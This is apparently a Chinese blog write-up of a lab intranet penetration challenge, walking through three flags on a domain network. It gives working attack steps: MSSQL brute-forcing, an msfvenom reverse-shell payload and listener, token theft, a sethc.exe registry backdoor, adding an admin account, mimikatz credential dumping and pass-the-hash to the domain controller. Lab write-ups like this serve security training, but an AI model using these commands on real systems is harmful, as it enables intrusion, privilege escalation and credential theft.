1、概述-靶标介绍
Tsclient是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。
2、靶场渗透过程
开局拿到ip地址
目标IP:39.98.126.12对IP地址进行端口扫描。
扫描结果80、1433、3389、445等端口。根据靶场提示,从mssql入手,一般就是暴力破解弱口令。这里我们使用美少妇(MSF)进行攻击。
use auxiliary/scanner/mssql/mssql_loginset RHOSTSset USER_FILE #设置用户名字典set PASS_FILE #设置密码字典exploit
经过爆破我们获取到了数据库用户名密码
sa:1qaz!QAZ为了方便直接使用数据库综合利用工具连接,然后查看权限较低
数据库利用工具:链接:https://pan.baidu.com/s/1vKrJSVAn06uP7scqtR_LVA提取码:sj9u
这个工具还是很强大的,知道数据库用户名密码,数据库名,相当于直接获取shell,可以上传文件等操作。
使用msfvenom生成windows可执行文件。
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=1234 -f exe > sahxsploit.exe
通过数据库利用工具上传生成的payload。
使用MSF进行监听
use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost ipset lport 1234run
然后在mssql服务器上运行我们上传的payload执行文件,获取meterpreter shell
直接getsystem获取system权限。
然后shell查看flag
type C:UsersAdministratorflagflag01.txt
第一个flag:flag{e461c739-afd1-41bb-adbb-68f7a79a9c48}获取了flag后我们继续进行信息收集,先查看mssql服务器的ip
查看系统用户以及在线用户
qusernet user
再接着上传fscan扫一下同网段的机器
172.22.8.18 WIN-WEB 就是我们攻击的机器172.22.8.31 XIAORANGWIN19-CLIENT172.22.8.15 DC XIAORANGDC01172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
从扫描信息中看mssql这台机器不在域中,15的是域控。
这里信息先放一边,我们查询到在线用户John,现在需要以John的身份登录,这里使用令牌窃取。
use incognitolist_tokens -u 列出可用令牌
然后我们使用John的令牌进行登录
impersonate_token WIN-WEB\John #这里需要使用\,无法执行成功
然后查看,令牌窃取登录成功。
现在以John用户身份进行了登录,再进行信息收集,通过信息收集发现,此用户开启默认共享。
直接默认共享目录
dir \TSCLIENTCtype \TSCLIENTCcredential.txt
获取到了一组域用户密码。
xiaorang.labAldrich:Ald@rLMWuy7Z!#到这里再搭建一下代理,方便我们进行渗透。使用frp
在公网服务器上frps.exe -c frps.ini
然后客户端,也就是在被入侵的mssql这台服务器上运行客户端
配置如下:[common]server_addr =公网ipserver_port = 7000[socks5]type = tcpplugin = socks5remote_port = 5000客户端执行命令fprc.exe -c frpc.ini
这里我们就获取到了一个socks5隧道,通过代理可直接在本地机器上访问内网主机等。
根据之前信息收集的内网机器以及与用户密码,远程桌面连接。
密码过期需要修改,这里我们使用kali上的工具rdesktop进行密码修改。配置proxychains代理
vim /etc/proxychains4.confproxychains4 -f /etc/proxychains4.conf rdesktop 172.22.8.46
然后修改密码
最后只有172.22.8.46可以进行登录,登录成功后权限过低。
根据实验环境提示,我们需要使用镜像劫持进行提权。先查看注册表权限。
get-acl -path "HKLM:SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options" | fl *
设置镜像劫持shift后门
REG ADD "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe" /v Debugger /t REG_SZ /d "C:windowssystem32cmd.exe"
然后退出登录状态后,5次shift键,调出cmd,然后查看权限为system。提权成功。
直接在这里查看第二个flag
第二个flag: flag{40ba82cd-58d6-4695-a037-acb35f5824d3}现在剩余一个flag,我们先在cmd中添加一个本地管理账户。
net user sahx Ald@rLMWuy7Z!# /addnet localgroup administrators sahx /add
使用创建用户远程登录系统,然后查看一下域管理组中的用户。
net group “domain admins” /domain
发现WIN2016$用户在域管理组中。然后直接通过远程上传一个mimikatz。使用管理员权限打开mimikatz,这就是之前创建管理员用户的初衷,只有管理员用户打开mimikatz才不会报错,否则会出现报错。直接使用
privilege::debug #提升权限token::elevate 将权限提升至system
导出用户hash
sekurlsa::logonpasswords
这里第一次没看见时间,使用修改密码之前得hash,获取域控目录提示错误。获取正确hash。
msv :[00000003] Primary* Username : WIN2016$* Domain : XIAORANG* NTLM : 9d6c7df3ce28115347bc80dc7ada7caa* SHA1 : 0d080e8314873b7cfc4c4e3eb7d6dabd9ce41a38
获取后进行hash传递。
sekurlsa::pth /user:WIN2016$ /domain:XIAORANG /ntlm:4ba974f170ab0fe1a8a1eb0ed8f6fe1a
dir查看域控目录,然后查看flag03
dir \172.22.8.15c$UsersAdministratorflagtype \172.22.8.15c$UsersAdministratorflagflag03.txt
第三个flag:flag{d702995f-dc0f-4137-b4bb-54524d320b27}
免责声明:
本公众号漏洞复现文章,SRC、渗透测试等文章,仅供学习参考,请勿用于实战!!有授权情况下除外!!由于传播、利用本公众号文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责
原文始发于微信公众号(sahx安全从业记):云境内网渗透靶场-Tsclient
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论